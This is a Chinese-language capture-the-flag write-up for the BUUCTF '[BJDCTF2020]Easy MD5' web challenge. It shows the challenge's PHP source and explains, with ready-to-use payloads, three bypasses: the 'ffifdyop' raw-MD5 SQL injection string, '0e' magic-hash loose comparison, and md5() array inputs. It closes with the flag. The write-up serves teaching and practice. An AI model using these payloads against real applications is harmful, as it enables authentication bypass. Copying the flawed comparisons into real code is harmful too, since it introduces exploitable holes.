BUUCTF WEB [BJDCTF2020]Easy MD5
源代码
leveldo.php
<?php
header('hint:select * from \'admin\' where password='.'md5($pass,true)');
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
@media all and (min-width:600px) {
* {
/*改变width计算为包含边框和内间距*/
box-sizing: border-box;
}
body {
/*控制页面内容水平和垂直居中*/
position: relative;
display: flex;
height: 550px;
align-items: center;
justify-content: center;
background-size: cover;
background-repeat: no-repeat;
}
/*container*/
.container {
border: rgba(240, 235, 235, 0.932) solid 3px;
box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
background-color: white;
width: 30%;
height: 20%;
border-radius: 8px;
position: relative;
}
/*container end*/
/*header*/
#header h1 {
position: relative;
text-align: center;
}
/*header end*/
/*main*/
.main {
align-items: center;
justify-content: center;
position: relative;
width: 100%;
height: 100%;
}
.main section {
width: 50%;
margin-left: 22%;
}
.main section .upload {
width: 400px;
}
.main section .upload .in{
margin-top: 10%;
border-radius:10px;
font-size: 17px;
color: rgba(44, 44, 44, 0.582);
font-family: "Microsoft YaHei";
border: rgba(240, 235, 235, 0.932) solid 3px;
box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
background-color: white;
}
.main section .upload .give{
margin-left: 10px;
border-radius:10px;
color: rgba(44, 44, 44, 0.582);
font-size: 17px;
font-family: "Microsoft YaHei";
border: white solid 3px;
background-color: white;
}
/*main end*/
}
</style>
</head>
<body>
<div class="container">
<div id="header">
</div><!-- /header end -->
<div class="main">
<section>
<form class="upload" action="leveldo4.php" method="GET">
<input type="text" id="name" name='password' class="in">
<input type="submit" class="give">
</form>
</section>
</div><!-- /main end -->
</div><!-- /container end -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>
</html>
<?php
error_reporting(0);
$password = $_GET['password'];
if($password == 'ffifdyop')
{
echo "<script>window.location.replace('./levels91.php')</script>";
}
?>
levels91.php
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
header('Location: levell14.php');
-->
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
span {
position: relative;
display: flex;
width: 100%;
height: 700px;
align-items: center;
font-size: 70px;
font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
justify-content: center;
}
</style>
</head>
<body>
<span>Do You Like MD5?</span>
</body>
</html>
<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
echo "<script>window.location.replace('./levell14.php')</script>";
}
?>
levell14.php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
flag.php
<?php
$flag = file_get_contents('/flag');
分析
leveldo.php
中的关键代码
$password = $_GET['password'];
if($password == 'ffifdyop')
{
echo "<script>window.location.replace('./levels91.php')</script>";
}
在文本栏中输入ffifdyop
并提交,跳转至levels91.php
levels91.php
中的关键代码
$a = $_GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
echo "<script>window.location.replace('./levell14.php')</script>";
}
这里涉及到双md5的弱类型比较绕过
md5("s1885207154a") => 0e509367213418206700842008763514
md5("s1836677006a") => 0e481036490867661113260034900752
这两个字符加密后均为0e开头,PHP会将其识别为科学表达式,不论后缀是什么,他们的值均为0
所以可以构造payload
/levels91.php?a=s1885207154a&b=s1836677006a
跳转至levell14.php
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
PHP中存在一个特性
md5([1,2,3]) == md5([4,5,6]) == NULL
所以当我们传入数组时就能够绕过这个过滤
param1[]=1¶m2[]=2
获得flag
flag{808e87d7-e419-4fab-a9f4-007d229b4c0f}